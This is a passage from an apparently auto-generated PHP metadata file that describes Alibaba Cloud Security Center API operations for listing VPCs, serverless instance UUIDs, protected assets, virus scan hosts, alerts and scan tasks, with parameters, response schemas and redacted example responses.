'type' => 'string', 'example' => 'cn-hangzhou', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Retrieve VPC data by region', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListUserVpc'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:ListUserVpc', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"A3D7C47D-3F11-57BB-90E8-E5C20C619F37\\",\\n \\"UserVpcInfos\\": [\\n {\\n \\"CreationTime\\": \\"2023-03-30T07:16:02Z\\",\\n \\"VpcName\\": \\"Vpc-1\\",\\n \\"Status\\": \\"Available\\",\\n \\"VpcId\\": \\"vpc-bp1qpo0kug3a20qqe****\\",\\n \\"VRouterId\\": \\"vrt-bp1jcg5cmxjbl9xgc****\\",\\n \\"CidrBlock\\": \\"192.168.XXX.XXX/16\\",\\n \\"Description\\": \\"This is my VPC.\\",\\n \\"Default\\": true,\\n \\"ModifyTime\\": \\"2023-03-30T07:16:02Z\\",\\n \\"RegionId\\": \\"cn-hangzhou\\"\\n }\\n ]\\n}","type":"json"}]', ], 'ListUuidsByAppId' => [ 'methods' => ['post', 'get'], 'schemes' => ['https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => [ 'operationType' => 'list', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeCode' => '227147', 'abilityTreeNodes' => ['FEATUREsasA217JR'], ], 'parameters' => [ [ 'name' => 'AppRegionId', 'in' => 'query', 'schema' => ['description' => 'The region ID.', 'type' => 'string', 'required' => false, 'example' => 'cn-hangzhou', 'title' => ''], ], [ 'name' => 'AppId', 'in' => 'query', 'schema' => ['description' => 'The SAE application ID.', 'type' => 'string', 'required' => false, 'example' => '5b41f4bf-349f-4263-89b1-9234c034****', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language of the request and response. Default value: **zh**. Valid values:'."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page in a paged query. Paging starts from page 1.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries per page in a paged query. Paging is performed based on this value.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'ResourceDirectoryUid', 'in' => 'query', 'schema' => ['description' => 'The UID of the resource directory.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '123456', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'title' => '', 'description' => 'ListResult', 'type' => 'object', 'properties' => [ 'Uuids' => [ 'description' => 'The list of UUIDs.', 'type' => 'array', 'items' => ['description' => 'The UUID of the Serverless instance.', 'type' => 'string', 'example' => 'ec8e305a-0882-4661-87a3-cd7e558d****', 'title' => ''], 'title' => '', 'example' => '', ], 'Count' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => '1383B0DB-D5D6-4B0C-9E6B-75939C8E****', 'title' => ''], ], 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'staticInfo' => ['returnType' => 'synchronous'], 'title' => 'Query serverless instance uUIDs by application ID', 'summary' => 'Queries the list of Serverless instance UUIDs by application ID.', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'list', 'ramAction' => [ 'action' => 'yundun-sas:DescribeUuidsByAppId', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"Uuids\\": [\\n \\"ec8e305a-0882-4661-87a3-cd7e558d****\\"\\n ],\\n \\"Count\\": 1,\\n \\"RequestId\\": \\"1383B0DB-D5D6-4B0C-9E6B-75939C8E****\\"\\n}","type":"json"}]', ], 'ListUuidsByWebPath' => [ 'summary' => 'Queries protected assets by web path.', 'methods' => ['post', 'get'], 'schemes' => ['https', 'http'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'deprecated' => false, 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'WebPath', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The web path.', 'type' => 'string', 'required' => false, 'example' => '/root/www****'], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page to display in a paging query.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries to display on each page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '20', 'title' => ''], ], [ 'name' => 'Type', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The type of the web path. Valid values:'."\n" ."\n" .'- **def**: automatically identified by the system'."\n" .'- **customize**: manually added.', 'type' => 'string', 'required' => false, 'example' => 'def'], ], ], 'responses' => [ 200 => [ 'headers' => [], 'schema' => [ 'type' => 'object', 'properties' => [ 'List' => [ 'description' => 'The list of protected assets.', 'type' => 'array', 'items' => [ 'description' => 'The protected asset.', 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The UUID of the server.', 'type' => 'string', 'example' => '49e25e0f-bb51-4a5a-a1b3-13a4ddaa****', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the server.', 'type' => 'string', 'example' => '8.210.XX.XX', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the server.', 'type' => 'string', 'example' => '172.25.XX.XX', 'title' => ''], 'MachineName' => ['description' => 'The name of the server.', 'type' => 'string', 'example' => 'test****', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries displayed on each page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], 'Count' => ['description' => 'The number of entries displayed on the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '10', 'title' => ''], ], 'title' => '', 'example' => '', ], 'RequestId' => ['description' => 'The ID of the request. The ID is a unique identifier that Alibaba Cloud generates for the request and can be used to troubleshoot issues.', 'type' => 'string', 'example' => 'A3C1240F-9DAC-5EE8-ADF5-2F930A95****', 'title' => ''], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query protected assets by web path', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListUuidsByWebPath'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListUuidsByWebPath', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"List\\": [\\n {\\n \\"Uuid\\": \\"49e25e0f-bb51-4a5a-a1b3-13a4ddaa****\\",\\n \\"InternetIp\\": \\"8.210.XX.XX\\",\\n \\"IntranetIp\\": \\"172.25.XX.XX\\",\\n \\"MachineName\\": \\"test****\\"\\n }\\n ],\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 10,\\n \\"Count\\": 10\\n },\\n \\"RequestId\\": \\"A3C1240F-9DAC-5EE8-ADF5-2F930A95****\\"\\n}","type":"json"}]', ], 'ListVirusScanMachine' => [ 'summary' => 'Queries the list of alert hosts for virus scanning.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of entries to return on each page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '20', 'title' => ''], ], [ 'name' => 'Remark', 'in' => 'query', 'schema' => ['description' => 'The asset information to query. You can set this parameter to an asset name or IP address.', 'type' => 'string', 'required' => false, 'example' => '192.168.1****', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the asset instance.', 'type' => 'string', 'required' => false, 'example' => '7cc91747-2845-40d4-bb69-c077597f****', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. The ID is a unique identifier that Alibaba Cloud generates for the request and can be used to troubleshoot issues.', 'type' => 'string', 'example' => 'A27C1C09-828B-5CB8-9203-F55423BE****', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries returned per page in a paging query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries.', 'type' => 'integer', 'format' => 'int32', 'example' => '168', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Data' => [ 'description' => 'The data details.', 'type' => 'array', 'items' => [ 'description' => 'The data details.', 'type' => 'object', 'properties' => [ 'Uuid' => ['description' => 'The UUID of the asset instance.', 'type' => 'string', 'example' => '6690a46c-0edb-4663-a641-3629d1a9****', 'title' => ''], 'InstanceName' => ['description' => 'The instance name.', 'type' => 'string', 'example' => 'centos****', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the associated instance.', 'type' => 'string', 'example' => '172.16.XX.XX', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the associated instance.', 'type' => 'string', 'example' => '10.42.XX.XX', 'title' => ''], 'InstanceId' => ['description' => 'The instance ID of the server.', 'type' => 'string', 'example' => 'i-bp180bogui4fc0z4****', 'title' => ''], 'EventCount' => ['description' => 'The number of security alert occurrences.', 'type' => 'integer', 'format' => 'int32', 'example' => '28', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query alert hosts for virus scanning', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListVirusScanMachine'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListVirusScanMachine', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"A27C1C09-828B-5CB8-9203-F55423BE****\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 168\\n },\\n \\"Data\\": [\\n {\\n \\"Uuid\\": \\"6690a46c-0edb-4663-a641-3629d1a9****\\",\\n \\"InstanceName\\": \\"centos****\\",\\n \\"InternetIp\\": \\"172.16.XX.XX\\",\\n \\"IntranetIp\\": \\"10.42.XX.XX\\",\\n \\"InstanceId\\": \\"i-bp180bogui4fc0z4****\\",\\n \\"EventCount\\": 28\\n }\\n ]\\n}","type":"json"}]', ], 'ListVirusScanMachineEvent' => [ 'summary' => 'Queries virus alerts detected by a virus scan on a specific server.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The maximum number of entries per page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'required' => true, 'example' => '20', 'title' => ''], ], [ 'name' => 'Uuid', 'in' => 'query', 'schema' => ['description' => 'The UUID of the server.', 'type' => 'string', 'required' => false, 'example' => 'a6931624-c43e-4323-9128-a6be6ffdxxxx', 'title' => ''], ], [ 'name' => 'OperateTaskId', 'in' => 'query', 'schema' => ['description' => 'The ID of the task generated by a handling operation.'."\n" .'> You can call the [OperateVirusEvents](~~OperateVirusEvents~~) operation to handle alerts and generate this parameter.', 'type' => 'string', 'required' => false, 'example' => '233886xx', 'title' => ''], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type for the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The ID of the request. Alibaba Cloud generates a unique identifier for each request. You can use the ID to troubleshoot issues.', 'type' => 'string', 'example' => '2DAEF40F-8E1A-550D-8793-99C61C401DD0', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The page number of the current page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page in a paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of alert events returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '149', 'title' => ''], ], 'title' => '', 'example' => '', ], 'Data' => [ 'description' => 'The details of the alert events.', 'type' => 'array', 'items' => [ 'description' => 'The data returned when the call is successful.', 'type' => 'object', 'properties' => [ 'EventId' => ['description' => 'The ID of the alert event.', 'type' => 'integer', 'format' => 'int64', 'example' => '911273', 'title' => ''], 'Level' => ['description' => 'The risk level of the alert event. Valid values:'."\n" .'- **serious**: Critical.'."\n" .'- **suspicious**: Suspicious.'."\n" .'- **remind**: Reminder.', 'type' => 'string', 'example' => 'serious', 'title' => ''], 'EventName' => ['description' => 'The name (subtype) of the alert event.', 'type' => 'string', 'example' => 'Malicious Software-Trojan', 'title' => ''], 'LastTimeStamp' => ['description' => 'The timestamp of the last occurrence, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1682046733628', 'title' => ''], 'Details' => [ 'description' => 'The details of the exception event.', 'type' => 'array', 'items' => [ 'description' => 'The data body.', 'type' => 'object', 'properties' => [ 'Type' => ['description' => 'The display format of the exception event details.'."\n" ."\n" .'Valid values:'."\n" ."\n" .'- **text**: plain text'."\n" .'- **html**: rich text', 'type' => 'string', 'example' => 'html', 'title' => ''], 'NameDisplay' => ['description' => 'The display name of the alert event.', 'type' => 'string', 'example' => 'Trojan Path', 'title' => ''], 'InfoType' => ['description' => 'The display type of valueDisplay.'."\n" .'Valid values:'."\n" .'- **download_url**: download link.', 'type' => 'string', 'example' => 'download_url', 'title' => ''], 'ValueDisplay' => ['description' => 'The additional attribute information of the exception event.'."\n" .'For example, the logon time or logon location for an unusual logon alert, or the trojan file path or trojan type for a trojan alert.', 'type' => 'string', 'example' => 'getopt', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], 'InstanceName' => ['description' => 'The instance name.', 'type' => 'string', 'example' => 'i-wz92q7m5hsbgfhdss***', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address.', 'type' => 'string', 'example' => '172.16.XX.XX', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address.', 'type' => 'string', 'example' => '10.42.XX.XX', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'description' => '', 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"2DAEF40F-8E1A-550D-8793-99C61C401DD0\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 149\\n },\\n \\"Data\\": [\\n {\\n \\"EventId\\": 911273,\\n \\"Level\\": \\"serious\\",\\n \\"EventName\\": \\"Malicious Software-Trojan\\",\\n \\"LastTimeStamp\\": 1682046733628,\\n \\"Details\\": [\\n {\\n \\"Type\\": \\"html\\",\\n \\"NameDisplay\\": \\"Trojan Path\\",\\n \\"InfoType\\": \\"download_url\\",\\n \\"ValueDisplay\\": \\"getopt\\"\\n }\\n ],\\n \\"InstanceName\\": \\"i-wz92q7m5hsbgfhdss***\\",\\n \\"InternetIp\\": \\"172.16.XX.XX\\",\\n \\"IntranetIp\\": \\"10.42.XX.XX\\"\\n }\\n ]\\n}","type":"json"}]', 'title' => 'Query alert events detected by server scan', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListVirusScanMachineEvent'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListVirusScanMachineEvent', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], ], 'ListVirusScanTask' => [ 'summary' => 'Queries virus scan tasks that match specified conditions such as scan type, scan status, and scanned machine information.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => ['operationType' => 'get'], 'parameters' => [ [ 'name' => 'TaskId', 'in' => 'query', 'schema' => ['description' => 'The ID of the virus scan task to query.'."\n" .'> Call [ListVirusScanTask](~~ListVirusScanTask~~) to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => '1471d8ebb96795b41ede090b9758****', 'title' => ''], ], [ 'name' => 'ScanType', 'in' => 'query', 'schema' => ['description' => 'The scan type of the virus scan task to query. Valid values:'."\n" ."\n" .'- **system**: automatic system scan'."\n" .'- **user**: custom user scan.', 'type' => 'string', 'required' => false, 'example' => 'user', 'title' => ''], ], [ 'name' => 'Status', 'in' => 'query', 'schema' => ['description' => 'The execution status of the virus scan task. Valid values:'."\n" .'- **1**: Scanning.'."\n" .'- **2**: Completed.'."\n" .'- **3**: Failed.'."\n" .'- **4**: Timed out.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'StartTime', 'in' => 'query', 'schema' => ['description' => 'The timestamp of the task start time to query, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1680919232000', 'title' => ''], ], [ 'name' => 'EndTime', 'in' => 'query', 'schema' => ['description' => 'The timestamp of the task end time to query, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'required' => false, 'example' => '1680919232999', 'title' => ''], ], [ 'name' => 'RootTask', 'in' => 'query', 'schema' => ['description' => 'Specifies whether the task is the root task of the virus scan.', 'type' => 'boolean', 'required' => false, 'example' => 'true', 'title' => ''], ], [ 'name' => 'RootTaskId', 'in' => 'query', 'schema' => ['description' => 'The root task ID.'."\n" .'> Call [GetVirusScanLatestTaskStatistic](~~GetVirusScanLatestTaskStatistic~~) to obtain this parameter.', 'type' => 'string', 'required' => false, 'example' => '89f5d7813bd59dd237580a8664b3xxxx', 'title' => ''], ], [ 'name' => 'MachineName', 'in' => 'query', 'schema' => ['description' => 'The name of the server.', 'type' => 'string', 'required' => false, 'example' => 'oracle-win-001****', 'title' => ''], ], [ 'name' => 'InternetIp', 'in' => 'query', 'schema' => ['description' => 'The public IP address.', 'type' => 'string', 'required' => false, 'example' => '120.27.XX.XX', 'title' => ''], ], [ 'name' => 'IntranetIp', 'in' => 'query', 'schema' => ['description' => 'The private IP address.', 'type' => 'string', 'required' => false, 'example' => '172.26.XX.XX', 'title' => ''], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the results to return. Default value: **1**, which indicates that results start from page 1.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], ], [ 'name' => 'PageSize', 'in' => 'query', 'schema' => ['description' => 'The number of tasks per page in a paged query. Default value: **20**, which indicates that each page contains 20 tasks.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '20', 'title' => ''], ], [ 'name' => 'StatusList', 'in' => 'query', 'style' => 'repeatList', 'schema' => [ 'description' => 'The list of statuses used to filter tasks by multiple statuses.', 'type' => 'array', 'items' => ['description' => 'The execution status of the virus scan task. Valid values:'."\n" .'- **1**: Scanning.'."\n" .'- **2**: Completed.'."\n" .'- **3**: Failed.'."\n" .'- **4**: Timed out.', 'type' => 'integer', 'format' => 'int32', 'required' => false, 'example' => '1', 'title' => ''], 'required' => false, 'maxItems' => 10, 'title' => '', 'example' => '', ], ], [ 'name' => 'Lang', 'in' => 'query', 'schema' => ['description' => 'The language type of the request and response. Default value: **zh**. Valid values:'."\n" ."\n" .'- **zh**: Chinese'."\n" .'- **en**: English.', 'type' => 'string', 'required' => false, 'example' => 'zh', 'title' => ''], ], ], 'responses' => [ 200 => [ 'schema' => [ 'description' => 'The response body.', 'type' => 'object', 'properties' => [ 'RequestId' => ['description' => 'The request ID, which is a unique identifier generated by Alibaba Cloud for the request. You can use this ID to troubleshoot issues.', 'type' => 'string', 'example' => 'A4EB8B1C-1DEC-5E18-BCD0-D1BBB3936FA7', 'title' => ''], 'PageInfo' => [ 'description' => 'The pagination information.', 'type' => 'object', 'properties' => [ 'CurrentPage' => ['description' => 'The current page number in the paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'PageSize' => ['description' => 'The maximum number of entries per page in the paged query.', 'type' => 'integer', 'format' => 'int32', 'example' => '20', 'title' => ''], 'TotalCount' => ['description' => 'The total number of entries returned.', 'type' => 'integer', 'format' => 'int32', 'example' => '224', 'title' => ''], ], 'title' => '', 'example' => '', ], 'List' => [ 'description' => 'The result list.', 'type' => 'array', 'items' => [ 'description' => 'The data entry in the list.', 'type' => 'object', 'properties' => [ 'TaskId' => ['description' => 'The ID of the scan task.', 'type' => 'string', 'example' => '2e75557bfa570381f5c516cad9b6xxxx', 'title' => ''], 'ScanType' => ['description' => 'The scan type of the virus scan task. Valid values:'."\n" ."\n" .'- **system**: automatic system scan'."\n" .'- **user**: custom user scan.', 'type' => 'string', 'example' => 'system', 'title' => ''], 'Status' => ['description' => 'The execution status of the virus scan task. Valid values:'."\n" .'- **1**: Scanning.'."\n" .'- **2**: Completed.'."\n" .'- **3**: Failed.'."\n" .'- **4**: Timed out.', 'type' => 'integer', 'format' => 'int32', 'example' => '1', 'title' => ''], 'StartTime' => ['description' => 'The start timestamp, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1651290987000', 'title' => ''], 'EndTime' => ['description' => 'The end timestamp, in milliseconds.', 'type' => 'integer', 'format' => 'int64', 'example' => '1662343860051', 'title' => ''], 'InstanceName' => ['description' => 'The name of the server instance.', 'type' => 'string', 'example' => 'sql-test-0****', 'title' => ''], 'InternetIp' => ['description' => 'The public IP address of the server.', 'type' => 'string', 'example' => '8.210.XX.XX', 'title' => ''], 'IntranetIp' => ['description' => 'The private IP address of the server.', 'type' => 'string', 'example' => '172.25.XX.XX', 'title' => ''], 'TaskName' => ['description' => 'The task name.'."\n" .'- **VIRUS\\_VUL\\_SCHEDULE\\_SCAN**: virus scan.', 'type' => 'string', 'example' => 'VIRUS_VUL_SCHEDULE_SCAN', 'title' => ''], 'Progress' => ['description' => 'The task progress percentage.', 'type' => 'integer', 'format' => 'int32', 'example' => '62', 'title' => ''], 'ScanPath' => [ 'description' => 'The scanned file information.', 'type' => 'array', 'items' => ['description' => 'The file path.', 'type' => 'string', 'example' => 'C:/test1', 'title' => ''], 'title' => '', 'example' => '', ], 'Uuid' => ['description' => 'The UUID of the server.', 'type' => 'string', 'example' => '49e25e0f-bb51-4a5a-a1b3-13a4ddaa****', 'title' => ''], ], 'title' => '', 'example' => '', ], 'title' => '', 'example' => '', ], ], 'title' => '', 'example' => '', ], ], ], 'errorCodes' => [ 403 => [ ['errorCode' => 'NoPermission', 'errorMessage' => 'caller has no permission', 'description' => ''], ], 500 => [ ['errorCode' => 'ServerError', 'errorMessage' => 'ServerError', 'description' => ''], ], ], 'title' => 'Query virus scan tasks', 'changeSet' => [], 'flowControl' => [ 'flowControlList' => [ ['threshold' => '10', 'countWindow' => 1, 'regionId' => '*', 'api' => 'ListVirusScanTask'], ], 'product' => ['code' => 'sas', 'title' => '云安全中心(态势感知)'], ], 'ramActions' => [ [ 'operationType' => 'get', 'ramAction' => [ 'action' => 'yundun-sas:ListVirusScanTask', 'authLevel' => 'operate', 'actionConditions' => [], 'resources' => [ ['validationType' => 'always', 'product' => 'ThreatDetection', 'resourceType' => 'All Resource', 'arn' => '*'], ], ], ], ], 'responseDemo' => '[{"errorExample":"","example":"{\\n \\"RequestId\\": \\"A4EB8B1C-1DEC-5E18-BCD0-D1BBB3936FA7\\",\\n \\"PageInfo\\": {\\n \\"CurrentPage\\": 1,\\n \\"PageSize\\": 20,\\n \\"TotalCount\\": 224\\n },\\n \\"List\\": [\\n {\\n \\"TaskId\\": \\"2e75557bfa570381f5c516cad9b6xxxx\\",\\n \\"ScanType\\": \\"system\\",\\n \\"Status\\": 1,\\n \\"StartTime\\": 1651290987000,\\n \\"EndTime\\": 1662343860051,\\n \\"InstanceName\\": \\"sql-test-0****\\",\\n \\"InternetIp\\": \\"8.210.XX.XX\\",\\n \\"IntranetIp\\": \\"172.25.XX.XX\\",\\n \\"TaskName\\": \\"VIRUS_VUL_SCHEDULE_SCAN\\",\\n \\"Progress\\": 62,\\n \\"ScanPath\\": [\\n \\"C:/test1\\"\\n ],\\n \\"Uuid\\": \\"49e25e0f-bb51-4a5a-a1b3-13a4ddaa****\\"\\n }\\n ]\\n}","type":"json"}]', ], 'ListVulAutoRepairConfig' => [ 'summary' => 'Queries the configurations of vulnerabilities that can be automatically fixed.', 'methods' => ['post', 'get'], 'schemes' => ['http', 'https'], 'security' => [ [ 'AK' => [], ], ], 'operationType' => 'read', 'systemTags' => [ 'operationType' => 'get', 'riskType' => 'none', 'chargeType' => 'free', 'abilityTreeNodes' => ['FEATUREsasU76LC1'], ], 'parameters' => [ [ 'name' => 'Type', 'in' => 'query', 'schema' => [ 'title' => '', 'description' => 'The type of the vulnerability. Valid values:'."\n" ."\n" .'- **cve**: Linux software vulnerability'."\n" .'- **sys**: Windows system vulnerability.', 'enumValueTitles' => [], 'type' => 'string', 'required' => false, 'example' => 'cve', ], ], [ 'name' => 'AliasName', 'in' => 'query', 'schema' => ['title' => '', 'description' => 'The alias of the vulnerability.', 'type' => 'string', 'required' => false, 'example' => 'RHSA-2022:0274-Important: polkit pkexec Local Privilege Escalation Vulnerability(CVE-2021-4034)'], ], [ 'name' => 'CurrentPage', 'in' => 'query', 'schema' => ['description' => 'The page number of the page to return. Default value: **1**, which indicates that the first page is returned.', 'type' => 'integer', 'format' => 'int32', 'minimum' => '1', 